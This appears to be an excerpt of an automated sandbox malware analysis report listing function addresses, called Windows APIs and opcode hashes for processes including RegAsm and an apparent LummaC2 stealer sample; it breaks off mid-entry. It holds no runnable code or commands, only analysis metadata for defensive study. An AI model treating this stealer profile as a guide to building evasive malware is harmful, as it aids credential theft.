Opcode Fuzzy Hash: 8a662b782932c3f2756261d44d53de3ad741e2b946e2440458a98d249727af80
Instruction Fuzzy Hash: BA4149B4900309DFDB14CF99D488AAEBBF5FF88314F249459D619A7360D774A841CBA4

Function 02854248 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 028559F1

Memory Dump Source

Source File: 00000007.00000002.4494548379.0000000002850000.00000040.00000800.00020000.00000000.sdmp, Offset: 02850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2850000_RegAsm.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 7e77594e5b0cf3b3a79062175fe3fe1fc44722d032637e79c23ac2b3365b4168
Instruction ID: 89fd2b93ea93fdaa4706c01d19266e796ad042260f8e7f27a7a3316d772b1577
Opcode Fuzzy Hash: 7e77594e5b0cf3b3a79062175fe3fe1fc44722d032637e79c23ac2b3365b4168
Instruction Fuzzy Hash: 5F41F4B4D0061DCBDB25CFA9C844B9DBBB5FF45314F50806AD408AB254DB79694ACF90

Function 02855935 Relevance: 1.6, APIs: 1, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 028559F1

Memory Dump Source

Source File: 00000007.00000002.4494548379.0000000002850000.00000040.00000800.00020000.00000000.sdmp, Offset: 02850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2850000_RegAsm.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 05788e881a3dd06d9f4d19a81469654eebe7a7c7869263a4bed165c10d5d051c
Instruction ID: 5a2e4738000366e79823ba86d70012479af1525f1b46217d197d0cb0b34a40ff
Opcode Fuzzy Hash: 05788e881a3dd06d9f4d19a81469654eebe7a7c7869263a4bed165c10d5d051c
Instruction Fuzzy Hash: 884112B4D04769CFDB15CFA8C98478DBBF1BF45304F20806AD808AB265CB79694ACF51

Function 0285C9A0 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0285D2C6,?,?,?,?,?), ref: 0285D387

Memory Dump Source

Source File: 00000007.00000002.4494548379.0000000002850000.00000040.00000800.00020000.00000000.sdmp, Offset: 02850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2850000_RegAsm.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 71011d3721714fe744bdb1f1448eaa868652726ea22705567f00a2f32e42dc39
Instruction ID: 4e3798c52646d5af5f266dff502535f3c9c453c52eb98c2a0c049369de2d646d
Opcode Fuzzy Hash: 71011d3721714fe744bdb1f1448eaa868652726ea22705567f00a2f32e42dc39
Instruction Fuzzy Hash: 0921E6B5900258EFDB10CF9AD984AEEBFF4FB48314F14845AE918A3310D378A954CFA4

Function 0285D2F9 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0285D2C6,?,?,?,?,?), ref: 0285D387

Memory Dump Source

Source File: 00000007.00000002.4494548379.0000000002850000.00000040.00000800.00020000.00000000.sdmp, Offset: 02850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2850000_RegAsm.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: df0f22f34c6954da5ffacf5e717cd59b597aaac164199ed9808d3c743a93b34d
Instruction ID: 63da7dee17f08107d8f07e15b0ebaf4f963587e7499be84741196a2c566f79a9
Opcode Fuzzy Hash: df0f22f34c6954da5ffacf5e717cd59b597aaac164199ed9808d3c743a93b34d
Instruction Fuzzy Hash: B621E4B59012589FDB10CFAAD585AEEBFF5FB48314F14841AE918A3310D378A944CFA0

Function 0285B2A0 Relevance: 1.6, APIs: 1, Instructions: 56
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0285B101,00000800,00000000,00000000), ref: 0285B312

Memory Dump Source

Source File: 00000007.00000002.4494548379.0000000002850000.00000040.00000800.00020000.00000000.sdmp, Offset: 02850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2850000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: b8b1c27cde334c25fd4dc102bcdc833150fc298014a1d9e51de8f4f8bcbed800
Instruction ID: 06ccf23dc80b8163808db8accda531003a384c3df3a4f7fc0e09de308c7fe998
Opcode Fuzzy Hash: b8b1c27cde334c25fd4dc102bcdc833150fc298014a1d9e51de8f4f8bcbed800
Instruction Fuzzy Hash: 661114BA8003488FDB10DF9AC944AEEFFF4EF58714F14842AD919A7200C379A545CFA1

Function 0285A870 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0285B101,00000800,00000000,00000000), ref: 0285B312

Memory Dump Source

Source File: 00000007.00000002.4494548379.0000000002850000.00000040.00000800.00020000.00000000.sdmp, Offset: 02850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2850000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 3ba05d4e1641a7cc7e1d4a51eb1382cbea0890359fd2f5bdf8267fc01a491f17
Instruction ID: d3a829b29ea7189533a6497baa0aec8ce63163222a50f9967f657bed463c15a5
Opcode Fuzzy Hash: 3ba05d4e1641a7cc7e1d4a51eb1382cbea0890359fd2f5bdf8267fc01a491f17
Instruction Fuzzy Hash: 731112BA9003599FDB10CF9AC544AEEFBF4EB58314F14842AE919B7200C379A545CFA5

Function 0285B020 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0285B086

Memory Dump Source

Source File: 00000007.00000002.4494548379.0000000002850000.00000040.00000800.00020000.00000000.sdmp, Offset: 02850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2850000_RegAsm.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 8cc1a15f5f1c95b92e1da9b7e052371172bfb859231fced82f26595c2b82248e
Instruction ID: 2e6a4c2976fd5565562385f47b1a0d9a15fb9cc51f3640297954fa1064ebd23b
Opcode Fuzzy Hash: 8cc1a15f5f1c95b92e1da9b7e052371172bfb859231fced82f26595c2b82248e
Instruction Fuzzy Hash: CC1102BAC003498FCB10DF9AC544A9EFBF4AF48224F10841AD829B7210C379A545CFA1

Function 05E60770 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4501070526.0000000005E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5e60000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c26f5383660db776d81cfb98981068092955ce4de57e271bcd5b123bde041775
Instruction ID: 9360f7d78b4838b5e3da4e26c4f43b859f6ccda9365d55adafe4a0d28b425c2a
Opcode Fuzzy Hash: c26f5383660db776d81cfb98981068092955ce4de57e271bcd5b123bde041775
Instruction Fuzzy Hash: E521D635B40115CF8F14DB65D4C84BDB3B2FB882887245169D94AD3350E731EC46CBE1

Function 00E5D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4490989704.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e5d000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9dec84d44be27c5d21f79059e80840db65915facb661050d6b75f789bca36912
Instruction ID: 66aecbef2cb92924b034c76a7bde41b639e866366ad48814608133e5d4089e5f
Opcode Fuzzy Hash: 9dec84d44be27c5d21f79059e80840db65915facb661050d6b75f789bca36912
Instruction Fuzzy Hash: 00213371108204DFDB25DF14CDC0B26BF65FB98329F20C969DD095B216C33AE85ACAA2

Function 05E60760 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4501070526.0000000005E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5e60000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee495a39505eed10484a9a20dd90988859a9f28552bc592912ca9e3fca96016e
Instruction ID: ae08fbe5f43cbfba86c21338d026d1754492aefffbf55ddcfa8dee0c80de4a7a
Opcode Fuzzy Hash: ee495a39505eed10484a9a20dd90988859a9f28552bc592912ca9e3fca96016e
Instruction Fuzzy Hash: 9B21B634B44212CF9B14DB75D4C847D77B2FF8928832455AAC48AD7351E731AC46CBE1

Function 00E6D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4491342018.0000000000E6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e6d000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4322244e0b9c39c0f43373cd2d001ab378a967b698a7e6ec840224897b5837fd
Instruction ID: c6907f2a8c2519f0babd3f166adae5106181abcf0914702c5e0f6dfd3db32565
Opcode Fuzzy Hash: 4322244e0b9c39c0f43373cd2d001ab378a967b698a7e6ec840224897b5837fd
Instruction Fuzzy Hash: DC212271A88240DFCB54CF24E980B26BF66EB88318F64C569D8095B256C33AD807CAA1

Function 00E6D005 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4491342018.0000000000E6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e6d000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4313d08043e77c7cf38cb03ec8efa3d44329a0da0b6c96a6f79782891a59ad07
Instruction ID: 5d210e693516f028067f7311da4a98bcb249ec1cd4ca015d1f753da103196797
Opcode Fuzzy Hash: 4313d08043e77c7cf38cb03ec8efa3d44329a0da0b6c96a6f79782891a59ad07
Instruction Fuzzy Hash: CE21837554D3C08FC702CF24D994715BF71EB46318F28C5EAD8498B657C33A980ACB62

Function 05E600CA Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4501070526.0000000005E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5e60000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15677f9dd6b329f27a52f74665778e415f5e1912f0744b9372234dd89297d3a4
Instruction ID: 210bae5abc3a39d61d0f8fc07d0f451a851a1b4070e9c82028547fb2abf474a1
Opcode Fuzzy Hash: 15677f9dd6b329f27a52f74665778e415f5e1912f0744b9372234dd89297d3a4
Instruction Fuzzy Hash: 5B112936A40228CFD754CF98C588AEDBBF6FF883A5F09A055D846A7251DB30DC81CB60

Function 00E5D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4490989704.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e5d000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07d586b370810bf15e8d939e07fb0dccd80900219e7a08ccebccaf9c83e80135
Instruction ID: 3e6f1518afcf3789b2237f88a343c6d0b6d8c2b1598ff9141c634464355abefc
Opcode Fuzzy Hash: 07d586b370810bf15e8d939e07fb0dccd80900219e7a08ccebccaf9c83e80135
Instruction Fuzzy Hash: 90110672404240CFDB16CF00D9C4B16BF71FB94325F24C6A9DD494B616C33AD45ACBA1

Function 05E606E8 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4501070526.0000000005E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5e60000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93edff32257e3d6ce527d1f6460a3bc26c399a9b42c049a872bc3d225824b0e9
Instruction ID: 069deebb8a27b00b4b4a2d86fb39d74a0097fa5fd808ca49afac3460a3b51492
Opcode Fuzzy Hash: 93edff32257e3d6ce527d1f6460a3bc26c399a9b42c049a872bc3d225824b0e9
Instruction Fuzzy Hash: D201D836B401058F9B14DE59D5848EFF7B6EB88354B20816AD60AD3345DB31ED16CFD1

Function 05E606D8 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4501070526.0000000005E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5e60000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74bd434d3f010f7d8165ae2e41db87a015fe3feb79127221fdcb44ff1027e6d6
Instruction ID: 8ec9c6ce3b6745d8659a53388f2777edaa8127ae3cbca9fd723b813b24d69ffe
Opcode Fuzzy Hash: 74bd434d3f010f7d8165ae2e41db87a015fe3feb79127221fdcb44ff1027e6d6
Instruction Fuzzy Hash: ED01F535B042068FCB14DF64C5888AEBBF6EF89344720806AC946D7345DB30AC46CFE1

Function 00E5D655 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4490989704.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e5d000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 159301d83dc4975d6a2cd986f6057c3da5ccd346cf5212d4da03efe1aadb0671
Instruction ID: eb6096859fdd3a55a1f4042ec98ca0725baf557ed36657ff7ac18c3bdc522738
Opcode Fuzzy Hash: 159301d83dc4975d6a2cd986f6057c3da5ccd346cf5212d4da03efe1aadb0671
Instruction Fuzzy Hash: 6B01FC3100934499E7308A15CD84756BF98DF41326F18CC29ED0D5A245C6B99846CAB1

Function 00E5D5F3 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4490989704.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e5d000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 522984e6bb47dc57bb247c3e41462a372180145d4ca34dbe94caabfed997890f
Instruction ID: e0ee232e594ecb74f8172330762e630fa38faeb93edf377dd7bb75130e3e6f2e
Opcode Fuzzy Hash: 522984e6bb47dc57bb247c3e41462a372180145d4ca34dbe94caabfed997890f
Instruction Fuzzy Hash: 02F037B6200640AF93208F0ACD84C23FBA9EBD4735319C49AE84A5B611C671EC42CAA0

Function 00E5D654 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4490989704.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e5d000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2e6e6112eb2930967bccb7b7b69a3e8afe15950c97680117756ed283a80a47f
Instruction ID: 43411ff0cffd3251155f2482d8baaf8e7c891208ca128630a00f194ea7218632
Opcode Fuzzy Hash: a2e6e6112eb2930967bccb7b7b69a3e8afe15950c97680117756ed283a80a47f
Instruction Fuzzy Hash: 95F0FC710093449EE7208E05CD84762FFD8EF51739F18C85AED0C5B246C2799C45CAB0

Function 00E5D5E4 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4490989704.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e5d000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 632805804d714dab6e4a079d39cfb49ab93424f18f43041bd213dc09f046de95
Instruction ID: 6509cd9b20e070ed1a6617ab7a8d93ea4748f61e1cc10a3e7f0f7ed2357622a4
Opcode Fuzzy Hash: 632805804d714dab6e4a079d39cfb49ab93424f18f43041bd213dc09f046de95
Instruction Fuzzy Hash: 66F03C75104680AFD325CF05CD84C62BFB9EF857607198489E88A5B612C671FC46CBA0

Analysis Process: lummac2.exePID: 5064, Parent PID: 6024COMMON

Executed Functions

Function 005E7D03 Relevance: 4.6, APIs: 3, Instructions: 131
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLogicalDrives.KERNEL32 ref: 005E7D03
GetLogicalDrives.KERNELBASE ref: 005E7E06
LoadLibraryW.KERNELBASE ref: 005E7EDB

Memory Dump Source

Source File: 00000008.00000002.2296676146.00000000005B1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000008.00000002.2296643185.00000000005B0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2296793390.00000000005ED000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2296895615.00000000005F0000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2296925620.00000000005F9000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2297004474.0000000000603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5b0000_lummac2.jbxd

Similarity

API ID: DrivesLogical$LibraryLoad
String ID:
API String ID: 3428323546-0
Opcode ID: 04a653198eb84b574f9bdb3f7dc81daec83d43516e27ccb7c8262f417e932df1
Instruction ID: 3e46af1d0aa43c2c619be004b24f6852022bd2ae45a09af029b9795e2ec854cb
Opcode Fuzzy Hash: 04a653198eb84b574f9bdb3f7dc81daec83d43516e27ccb7c8262f417e932df1
Instruction Fuzzy Hash: 3E51ABB0514686EFC7188F29ED50A25BFB2FF69301B14892CE4C6C7711E339A959DF82

Function 005E8B54 Relevance: 1.6, APIs: 1, Instructions: 60
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(005EB9CC,005C003F,00000006,00120089,?,00000018,ONA@,00000000,005C50AA), ref: 005E8AF6

Memory Dump Source

Source File: 00000008.00000002.2296676146.00000000005B1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000008.00000002.2296643185.00000000005B0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2296793390.00000000005ED000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2296895615.00000000005F0000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2296925620.00000000005F9000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2297004474.0000000000603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5b0000_lummac2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 808dfca811876df5f719f1f64d9c89eab0fe7c800de4765a0bca57a1b6809b2e
Instruction ID: 19f0ce80216316aa2f76527e6825829d1c2ba489b3c3ecad658e95c923094a76
Opcode Fuzzy Hash: 808dfca811876df5f719f1f64d9c89eab0fe7c800de4765a0bca57a1b6809b2e
Instruction Fuzzy Hash: 341194F1914610AFC760DF3ECC071577FE4EA0A2207500A6DF8EAD7690D231A805DBD6

Function 005E88E0 Relevance: 4.5, APIs: 3, Instructions: 8
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNELBASE(005B930C), ref: 005E88EB
FreeLibrary.KERNELBASE ref: 005E88F7
FreeLibrary.KERNELBASE ref: 005E8903

Memory Dump Source

Source File: 00000008.00000002.2296676146.00000000005B1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000008.00000002.2296643185.00000000005B0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2296793390.00000000005ED000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2296895615.00000000005F0000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2296925620.00000000005F9000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2297004474.0000000000603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5b0000_lummac2.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 16d6fadef8ce15d6bf439cdcc29ae76cdaf36f24807310fa57b4b78611e4f6e0
Instruction ID: feca97bc28bfa52b36572efaf45220a62963a8ad180d92549260e2951a8175e3
Opcode Fuzzy Hash: 16d6fadef8ce15d6bf439cdcc29ae76cdaf36f24807310fa57b4b78611e4f6e0
Instruction Fuzzy Hash: C8C0EA390911139BCF063FA0FC2C56A7F63FB953A93246415F50A810708BA61459EB01

Function 005E7F3F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 125
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNELBASE ref: 005E80BC

Strings

~!F#, xrefs: 005E8036

Memory Dump Source

Source File: 00000008.00000002.2296676146.00000000005B1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000008.00000002.2296643185.00000000005B0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2296793390.00000000005ED000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2296895615.00000000005F0000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2296925620.00000000005F9000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2297004474.0000000000603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5b0000_lummac2.jbxd

Similarity

API ID: LibraryLoad
String ID: ~!F#
API String ID: 1029625771-2540682645
Opcode ID: 76418e8a5e9489843a2a6ac18564f9a8272c2bc2efe49e8ceb884932ad320d1c
Instruction ID: f404748259286a082f345831b742e5bc1fa3eed6849e0b704782a2d955a44411
Opcode Fuzzy Hash: 76418e8a5e9489843a2a6ac18564f9a8272c2bc2efe49e8ceb884932ad320d1c
Instruction Fuzzy Hash: 6B4171B52046429FD71CCF16C4A462AFBF3BF99310728861CC48657B54CB35A555CBC4

Function 005B92B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32 ref: 005B9318

Strings

system or character via spellings glyphs a is uses that in their modified other on often reflection or resemblance on it leetspeak, used similarity internet. play eleet the of the replacements of primarily ways, xrefs: 005B92E6

Memory Dump Source

Source File: 00000008.00000002.2296676146.00000000005B1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000008.00000002.2296643185.00000000005B0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2296793390.00000000005ED000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2296895615.00000000005F0000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2296925620.00000000005F9000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2297004474.0000000000603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5b0000_lummac2.jbxd

Similarity

API ID: ExitProcess
String ID: system or character via spellings glyphs a is uses that in their modified other on often reflection or resemblance on it leetspeak, used similarity internet. play eleet the of the replacements of primarily ways
API String ID: 621844428-780655312
Opcode ID: 69930aff27167a72ab54f46f698939ff73529e0af3c758bb05a6de8daf77801c
Instruction ID: 34a5fbfd9d0a1715d918d2d9551ed7a3335997c7afc3edd30ecbe990543c7a7e
Opcode Fuzzy Hash: 69930aff27167a72ab54f46f698939ff73529e0af3c758bb05a6de8daf77801c
Instruction Fuzzy Hash: 35F08274C1C205E6CE007BB59A0B7FDBFE87FA2340F550C16EF8641191EA60B508A2D3

Function 005E8AD0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 12
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(005EB9CC,005C003F,00000006,00120089,?,00000018,ONA@,00000000,005C50AA), ref: 005E8AF6

Strings

ONA@, xrefs: 005E8AE4

Memory Dump Source

Source File: 00000008.00000002.2296676146.00000000005B1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000008.00000002.2296643185.00000000005B0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2296793390.00000000005ED000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2296895615.00000000005F0000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2296925620.00000000005F9000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2297004474.0000000000603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5b0000_lummac2.jbxd

Similarity

API ID: InitializeThunk
String ID: ONA@
API String ID: 2994545307-126421097
Opcode ID: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
Instruction ID: 9a2a3e30e6272c7ba4599b7d5b49d8b1df743313db24dc7d28a19b0c9381744b
Opcode Fuzzy Hash: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
Instruction Fuzzy Hash: 82D04875908216AB9A09CF44C54040EFBE6BFC4714F228C8EA88873214C3B0BD46EB82

Function 005E883C Relevance: 1.6, APIs: 1, Instructions: 112
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.2296676146.00000000005B1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000008.00000002.2296643185.00000000005B0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2296793390.00000000005ED000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2296895615.00000000005F0000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2296925620.00000000005F9000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2297004474.0000000000603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5b0000_lummac2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da48a72bd989f8cccaf0068e5ef9a819b5e1229c43ca8dc27c8bce03f958cf24
Instruction ID: fd472060a22a6760b84057c9cff38c0be5a6c71e94c2a8594cf9aa0fb6376d74
Opcode Fuzzy Hash: da48a72bd989f8cccaf0068e5ef9a819b5e1229c43ca8dc27c8bce03f958cf24
Instruction Fuzzy Hash: 5E315EB0514281CBDB2CCF1AD8A0726BBA2FF99340B24886DD8864F35AC735D406CF94

Function 005E8789 Relevance: 1.6, APIs: 1, Instructions: 60
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNELBASE ref: 005E881B

Memory Dump Source

Source File: 00000008.00000002.2296676146.00000000005B1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000008.00000002.2296643185.00000000005B0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2296793390.00000000005ED000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2296895615.00000000005F0000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2296925620.00000000005F9000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2297004474.0000000000603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5b0000_lummac2.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 3f8284b9ecb6ca90ee075da488d0ffe4a6c444ce5d2117a16df9cb67cfe3fc4a
Instruction ID: 01a7ea2e5213af4ebc9e2db7e9cce7ee79ea8a3c75fe97ea89ab1cd7925beb32
Opcode Fuzzy Hash: 3f8284b9ecb6ca90ee075da488d0ffe4a6c444ce5d2117a16df9cb67cfe3fc4a
